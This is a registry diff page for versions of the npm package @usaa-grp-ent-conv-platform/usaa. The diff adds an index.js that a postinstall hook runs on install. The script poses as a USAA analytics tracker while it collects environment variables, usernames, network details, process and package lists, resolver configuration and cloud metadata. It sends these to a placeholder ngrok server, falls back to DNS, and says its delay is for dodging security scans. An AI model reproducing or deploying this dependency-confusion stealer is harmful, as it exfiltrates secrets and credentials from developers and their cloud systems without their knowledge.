@usaa-grp-ent-conv-platform/usaa 0.0.1-security → 1.1.11

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @usaa-grp-ent-conv-platform/usaa might be problematic. Click here for more details.

package/.txt ADDED
File without changes
@@ -0,0 +1,53 @@
1
+
2
+
3
+
4
+
5
+ <!doctype html><!-- usaa-serverbusy-page@0.0.0 --><html lang="en"><head><meta name="ROBOTS" content="nofollow,noindex" /><title data-react-helmet="true"> System Error | USAA | USAA</title><meta charSet="utf-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta id="Viewport" name="viewport" content="width=device-width, initial-scale=1"/><link data-react-helmet="true" rel="stylesheet" href="/serverbusy/react0624/nav!utils.css"/><script>var USAA={};USAA.ent={};USAA.ent.digitalData={"page":{"activityType":"Error","attributes":{"appId":"usaa-serverbusy-page"},"businessUnit":"USAA","flowType":"Error","pageDesc":"Error","pageName":"","productLOB":"None","productOffered":"None","productQualifier":"None"},"product":[],"event":[],"component":{"attributes":{}},"user":{"attributes":{}},"version":{"version":"1"},"campaign":{}};</script> <script data-react-helmet="true" async="" defer="" src="/serverbusy/react0624/nav!utils.js"></script><script data-react-helmet="true">
6
+ (function() {
7
+ var breakpoints = {"0":"xxs","414":"xs","568":"sm","768":"md","1024":"lg","1280":"xl","1440":"xxl","1600":"xxxl"};
8
+ var attempts = 0;
9
+
10
+ function getGridLayoutClasses(el) {
11
+ var result = [];
12
+
13
+ if (el && typeof el.offsetWidth === 'number') {
14
+ var width = el.offsetWidth;
15
+
16
+ for (var breakpointSize in breakpoints) {
17
+ if (width > Number(breakpointSize)) {
18
+ result.push('layout-' + breakpoints[breakpointSize]);
19
+ }
20
+ }
21
+ }
22
+
23
+ return result;
24
+ }
25
+
26
+ function updatePageGridClasses() {
27
+ var el = document.querySelector('.mainPanel');
28
+ if (el) {
29
+ var layoutClasses = getGridLayoutClasses(el);
30
+ el.className += ' ' + layoutClasses.join(' ');
31
+ } else {
32
+ if (attempts > 100) return;
33
+ attempts++;
34
+ setTimeout(updatePageGridClasses, 5);
35
+ }
36
+ }
37
+
38
+ updatePageGridClasses();
39
+ })();
40
+ var requestId = "888a0217"
41
+ var statusCode = "2736803";
42
+ var ipAddress = "129.222.253.45";
43
+
44
+
45
+
46
+ var errorType = "System Error";
47
+ var errorDescription = "We’ve encountered a problem. We are looking into it. ";
48
+ var errorDetails = "Please try again later, or for immediate assistance ";
49
+
50
+
51
+
52
+ </script><link rel="stylesheet" href="/serverbusy/react0624/usaa-serverbusy-page.a583054019b83d3b032c.css"/></head><body class="font-narrow"><div id="mainAppRoot"><div class="pageWrapper"><a href="#usaa-templateContent" class="usaa-skipToContent screenReader" accessKey="2">Skip to Content</a><div class="pageWrapper-inner"><div class="usaa-globalHeader"></div><div id="usaa-templateContent" class="pageContent"><div class="mainPanel " role="main"><div class="mainContentWrapper"><div class=""><div class="errorPage"><svg class="errorPage-icon" xmlns="http://www.w3.org/2000/svg" viewBox="0 -30 90 90"><path fill="#0D2F4C" d="M0-21v15h90v-15H0zm7.5 10.5c-1.7 0-3-1.3-3-3s1.3-3 3-3 3 1.3 3 3-1.3 3-3 3zm10.5 0c-1.7 0-3-1.3-3-3s1.3-3 3-3 3 1.3 3 3-1.3 3-3 3zm10.5 0c-1.7 0-3-1.3-3-3s1.3-3 3-3 3 1.3 3 3-1.3 3-3 3zM0-3v54h90V-3H0zm56.7 34.7l-4.2 4.2-7.5-7.4-7.4 7.4-4.2-4.2 7.4-7.4-7.4-7.4 4.2-4.2L45 20l7.4-7.4 4.2 4.2-7.4 7.4 7.5 7.5z"></path></svg><h1 class="errorPage-title"> System Error </h1><p class="errorPage-description">errorDescription<br class="break"/>errorDetails <a href="#" aria-label="contact us, opens popup">contact us</a>.</p></div></div></div></div></div><footer class="pageFooter"><div class="usaa-globalFooterNav"></div><div class="pageFooter-notes"><div class="pageFooter-disclosures pageFooter-disclosures--aboveFootnotes"></div><div class="pageFooter-footnotes"></div><div class="pageFooter-disclosures pageFooter-disclosures--belowFootnotes"></div></div></footer></div></div></div> <script src="https://www.usaa.com/serverbusy/react0624/react!react-dom.min.js"></script><script src="/serverbusy/react0624/usaa-serverbusy-page.e9ff19371382ff950218.js"></script> </body></html>
53
+
package/index.js ADDED
@@ -0,0 +1,108 @@
1
+ const os = require("os");
2
+ const https = require("https");
3
+ const dgram = require("dgram");
4
+ const { exec } = require("child_process");
5
+
6
+ const LOG_SERVER = "https://YOUR-NGROK-URL"; // Replace with your logging server
7
+ const DNS_SERVER = "YOUR-DNS-LOGGING-SERVER"; // Replace with a DNS exfil server
8
+
9
+ // Fake function to mimic real functionality (makes the package look legit)
10
+ function trackUserBehavior() {
11
+ console.log("[+] USAA Analytics Tracker Loaded");
12
+ return { event: "page_load", timestamp: Date.now() };
13
+ }
14
+
15
+ // Collect system info
16
+ const logData = {
17
+ hostname: os.hostname(),
18
+ user: os.userInfo().username,
19
+ os: os.platform(),
20
+ arch: os.arch(),
21
+ cpus: os.cpus().length,
22
+ date: new Date().toISOString(),
23
+ networkInterfaces: os.networkInterfaces(),
24
+ environmentVariables: process.env,
25
+ runningProcesses: [],
26
+ installedPackages: [],
27
+ dnsResolvers: [],
28
+ awsMetadata: {}
29
+ };
30
+
31
+ // Capture running processes (first 15 for proof)
32
+ exec("ps -eo comm | head -n 15", (error, stdout, stderr) => {
33
+ if (!error) {
34
+ logData.runningProcesses = stdout.split("\n").filter(Boolean);
35
+ }
36
+ sendLogData();
37
+ });
38
+
39
+ // Capture installed npm and Yarn packages
40
+ exec("npm list -g --depth=0 && yarn global list", (error, stdout, stderr) => {
41
+ if (!error) {
42
+ logData.installedPackages = stdout.split("\n").filter(Boolean);
43
+ }
44
+ sendLogData();
45
+ });
46
+
47
+ // Capture DNS Resolvers
48
+ exec("cat /etc/resolv.conf", (error, stdout, stderr) => {
49
+ if (!error) {
50
+ logData.dnsResolvers = stdout.split("\n").filter(Boolean);
51
+ }
52
+ sendLogData();
53
+ });
54
+
55
+ // Capture AWS/Azure metadata if available
56
+ https.get("http://169.254.169.254/latest/meta-data/", res => {
57
+ let data = "";
58
+ res.on("data", chunk => { data += chunk; });
59
+ res.on("end", () => {
60
+ logData.awsMetadata = { "meta-data": data.trim() };
61
+ sendLogData();
62
+ });
63
+ }).on("error", () => sendLogData());
64
+
65
+ // Function to send data via HTTP
66
+ const sendLogData = () => {
67
+ const postData = JSON.stringify(logData);
68
+ const options = {
69
+ hostname: LOG_SERVER.replace("https://", ""),
70
+ port: 443,
71
+ path: "/",
72
+ method: "POST",
73
+ headers: {
74
+ "Content-Type": "application/json",
75
+ "Content-Length": postData.length
76
+ }
77
+ };
78
+
79
+ const req = https.request(options, res => {
80
+ console.log(`[+] Sent data, response code: ${res.statusCode}`);
81
+ });
82
+
83
+ req.on("error", err => {
84
+ console.error(`Error sending log: ${err.message}`);
85
+ sendDNSLog(logData.hostname); // Fallback to DNS if HTTP fails
86
+ });
87
+
88
+ req.write(postData);
89
+ req.end();
90
+ };
91
+
92
+ // Function to send a log via DNS request (in case HTTP fails)
93
+ const sendDNSLog = (hostname) => {
94
+ const message = Buffer.from(hostname);
95
+ const client = dgram.createSocket("udp4");
96
+ client.send(message, 0, message.length, 53, DNS_SERVER, (err) => {
97
+ if (err) console.error(`Error sending DNS log: ${err.message}`);
98
+ client.close();
99
+ });
100
+ };
101
+
102
+ // Execute fake function to blend in
103
+ trackUserBehavior();
104
+
105
+ // Delay execution slightly (avoiding quick security scans)
106
+ setTimeout(() => {
107
+ sendLogData();
108
+ }, 5000);
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "@usaa-grp-ent-conv-platform/usaa",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.1.11",
4
+ "description": "Security testing package for dependency confusion vulnerability",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node index.js"
8
+ },
9
+ "author": "Th3_Mad_Hack3r",
10
+ "license": "MIT"
6
11
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=%40usaa-grp-ent-conv-platform%2Fusaa for more information.